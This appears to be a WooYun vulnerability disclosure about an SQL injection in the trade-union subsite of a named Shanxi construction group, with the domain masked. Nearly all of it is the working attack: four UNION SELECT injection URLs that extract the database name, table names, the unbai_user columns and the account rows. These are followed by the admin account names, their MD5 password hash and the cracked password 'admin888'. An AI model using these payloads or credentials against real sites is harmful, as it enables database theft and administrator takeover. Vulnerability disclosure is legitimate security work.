WooYun.org

山西建筑工程(集团)总公司 网站：http://**.**.**.**

工会分站：http://zcb.**.**.**.**
漏洞页面 http://zcb.**.**.**.**/index.php/Index/Ndetails/class/women/htmls/nggzwq/id/1297.htm
sql 注入漏洞
（一）获取数据库名 gonghui1
http://zcb.**.**.**.**/index.php/Index/Ndetails/class/women/htmls/nggzwq/id/1297 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12

（二）获得表名
http://zcb.**.**.**.**/index.php/Index/Ndetails/class/women/htmls/nggzwq/id/1297 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=0x676F6E6768756931
可以得到unbai_about,unbai_access,,unbai_project,unbai_role,unbai_role_user等表名

（三）获得unbai_user表的列名
http://zcb.**.**.**.**/index.php/Index/Ndetails/class/women/htmls/nggzwq/id/1297 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0x756E6261695F75736572
(四)获得unbai_user表的内容，
http://zcb.**.**.**.**/index.php/Index/Ndetails/class/women/htmls/nggzwq/id/1297 and 1=2 union select 1,2,group_concat(id,0x5c,account,0x5c,nickname,0x5c,password,0x5c),4,5,6,7,8,9,10,11,12 from unbai_user

可以得到管理员账号和密码
admin 管理员 7fef6171469e80d32c0559f88b377245
adminlogin 网站管理员 7fef6171469e80d32c0559f88b377245
md5解密可以的密码为 admin888